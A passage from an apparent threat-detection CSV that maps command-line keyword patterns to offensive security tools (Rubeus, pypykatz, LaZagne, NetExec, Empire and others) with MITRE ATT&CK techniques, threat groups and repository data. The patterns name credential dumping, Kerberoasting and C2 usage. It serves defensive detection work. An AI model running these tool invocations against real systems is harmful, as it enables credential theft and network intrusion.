CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Octoberfest7/KillDefender_BOF","1","0","N/A","10","10","50","16","2022-06-28T15:54:15Z","2022-02-11T07:03:59Z" +"* keepass /unprotect*","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","0","N/A","10","10","961","187","2023-08-28T19:03:12Z","2018-08-22T17:39:31Z" +"* KeeTheft.exe*","offensive_tool_keyword","KeeThiefSyscalls","Patch GhostPack/KeeThief for it to use DInvoke and syscalls","T1003.001 - T1558.002","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/Metro-Holografix/KeeThiefSyscalls","1","0","private github repo","10","1","N/A","N/A","N/A","N/A" +"* kerberoast *","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"* kerberoast *","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). 
Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"* kerberoast /spn:*","offensive_tool_keyword","nanorobeus","COFF file (BOF) for managing Kerberos tickets.","T1558.003 - T1208","TA0006 - TA0007","N/A","N/A","C2","https://github.com/wavvs/nanorobeus","1","0","N/A","10","10","234","28","2023-07-02T12:56:27Z","2022-07-04T00:33:30Z" +"* Kerberoastables.txt*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"* --kerberoasting *","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"* kerberos asreproast *","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" +"* kerberos brute * -d *","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential 
Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" +"* kerberos brute *.txt*","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" +"* kerberos ccache del *.ccache*","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" +"* kerberos ccache exportkirbi *","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" +"* kerberos ccache list *.ccache*","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" +"* kerberos ccache loadkirbi *","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" +"* kerberos ccache roast *","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential 
Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" +"* kerberos keytab *.keytab*","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" +"* kerberos kirbi parse *","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" +"* kerberos spnroast *","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" +"* kerberos tgt *kerberos+rc4://*:*@*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"* kerberos.py*","offensive_tool_keyword","crackmapexec","protocol scripts from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"* --key examples/conspicuous.priv --isconspicuous*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"* --key PPLBlade*","offensive_tool_keyword","PPLBlade","Protected Process Dumper Tool that support obfuscating memory dump and transferring it on remote workstations without dropping it onto the disk.","T1003.001 - T1027.004 - T1560.001 - T1039 - T1570","TA0006 - TA0005 - TA0010 - TA0003","N/A","N/A","Credential Access - Data Exfiltration","https://github.com/tastypepperoni/PPLBlade","1","0","N/A","10","4","324","36","2023-08-30T07:59:51Z","2023-08-29T19:36:04Z" +"* keylogger *","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"* --keyword * --check --ocr * --alexa*","offensive_tool_keyword","domainhunter","Checks expired domains for categorization/reputation and Archive.org history to determine good candidates for phishing and C2 domain names ","T1583.002 - T1568.002","TA0011 - TA0009","N/A","N/A","Phishing","https://github.com/threatexpress/domainhunter","1","0","N/A","N/A","10","1380","291","2022-10-26T03:15:13Z","2017-03-01T11:16:26Z" +"* -KillDate *","offensive_tool_keyword","empire","empire agent.ps1 arguments.Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1063","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"* -KillDays *","offensive_tool_keyword","empire","empire agent.ps1 arguments.Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1064","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"* kimi.py *","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","0","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" +"* KittyStager*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. 
The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","0","N/A","10","10","176","35","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" +"* klist * /service:*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"* knx-gateway-discover.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* knx-gateway-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* KRB hijacking module *","offensive_tool_keyword","krbjack","A Kerberos AP-REQ hijacking tool with DNS unsecure updates abuse.","T1558.002 - T1552.004 - T1048.005","TA0006 - TA0007 ","N/A","N/A","Sniffing & Spoofing","https://github.com/almandin/krbjack","1","0","N/A","10","1","73","13","2023-05-21T15:00:07Z","2023-04-16T10:44:55Z" +"* krb5-enum-users.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* --krbpass * --krbsalt * -t * --escalate-user *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"* --krbpass *--krbsalt*","offensive_tool_keyword","krbrelayx","Kerberos unconstrained delegation abuse toolkit","T1558.003 - T1098","TA0004 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/dirkjanm/krbrelayx","1","0","N/A","N/A","10","902","148","2023-09-07T20:11:36Z","2019-01-08T18:42:07Z" +"* KRBUACBypass*","offensive_tool_keyword","KRBUACBypass","UAC Bypass By Abusing Kerberos Tickets","T1548.002 - T1558 - T1558.003","TA0004 - 
TA0006","N/A","N/A","Defense Evasion","https://github.com/wh0amitz/KRBUACBypass","1","0","N/A","8","5","402","52","2023-08-10T02:51:59Z","2023-07-27T12:08:12Z" +"* -l nmapRssuilt.xml -v*","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","0","N/A","10","10","4058","489","2023-09-30T05:33:44Z","2022-06-20T03:11:08Z" +"* Ladon.ps1*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" +"* 
Ladon.py*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" +"* Lalin.sh*","offensive_tool_keyword","LALIN","this script automatically install any package for pentest with uptodate tools . and lazy command for run the tools like lazynmap . 
install another and update to new","T1588","N/A","N/A","N/A","Exploitation tools","https://github.com/screetsec/LALIN","1","0","N/A","N/A","4","350","164","2017-04-13T13:47:21Z","2016-06-10T07:53:49Z" +"* laps.py *--ldapserver*","offensive_tool_keyword","LAPSDumper","Dumping LAPS from Python","T1136.001 - T1112 - T1078.001","TA0002 - TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/n00py/LAPSDumper","1","0","N/A","10","3","222","34","2022-12-07T18:35:28Z","2020-12-19T05:15:10Z" +"* laps.py *-u * -p *","offensive_tool_keyword","LAPSDumper","Dumping LAPS from Python","T1136.001 - T1112 - T1078.001","TA0002 - TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/n00py/LAPSDumper","1","0","N/A","10","3","222","34","2022-12-07T18:35:28Z","2020-12-19T05:15:10Z" +"* laZagne.py*","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). 
This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","0","N/A","10","10","8530","1980","2023-08-12T12:38:22Z","2015-02-16T14:10:02Z" +"* lazypariah*","offensive_tool_keyword","LAZYPARIAH","LAZYPARIAH - A Tool For Generating Reverse Shell Payloads On The Fly","T1059 - T1566 - T1212 - T1574","TA0002 - TA0003 - TA0008","N/A","N/A","POST Exploitation tools","https://github.com/octetsplicer/LAZYPARIAH","1","0","N/A","N/A","2","136","30","2022-06-18T08:59:45Z","2020-11-20T05:08:36Z" +"* ldap * --gmsa *dump*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"* ldap * --trusted-for-delegation*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"* ldap * -u * -p * --admin-count*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"* ldap * -u * -p * -M whoami 
*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"* ldap-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* ldap-novell-getpass.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* ldap-rootdse.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* ldap-search.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* --ldapusername * --ldappassword *","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","5","440","125","2023-10-04T21:38:29Z","2021-07-12T17:07:04Z" +"* ldeep_dump *","offensive_tool_keyword","ldeep","In-depth ldap enumeration utility","T1589 T1590 T1591","N/A","N/A","N/A","Reconnaissance","https://github.com/franc-pentest/ldeep","1","0","N/A","N/A","3","219","26","2023-10-02T20:36:02Z","2018-10-22T18:21:44Z" +"* lexmark-config.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* linpeas.sh *","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","0","N/A","N/A","10","13378","2821","2023-10-04T17:36:13Z","2019-01-13T19:58:24Z" +"* linpeas.sh*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"* -linpeas=http://127.0.0.1/linpeas.sh*","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","0","N/A","N/A","10","13378","2821","2023-10-04T17:36:13Z","2019-01-13T19:58:24Z" +"* linWinPwn*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation 
Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"* --list=hidden-options*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"* --list-payloads*","offensive_tool_keyword","GreatSCT","The project is called Great SCT (Great Scott). Great SCT is an open source project to generate application white list bypasses. This tool is intended for BOTH red and blue team.","T1055 - T1112 - T1189 - T1205","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/GreatSCT/GreatSCT","1","0","N/A","N/A","10","1103","214","2021-02-10T22:05:27Z","2017-05-12T03:30:41Z" +"* live dpapi blobfile *.blob*","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" +"* live dpapi cred 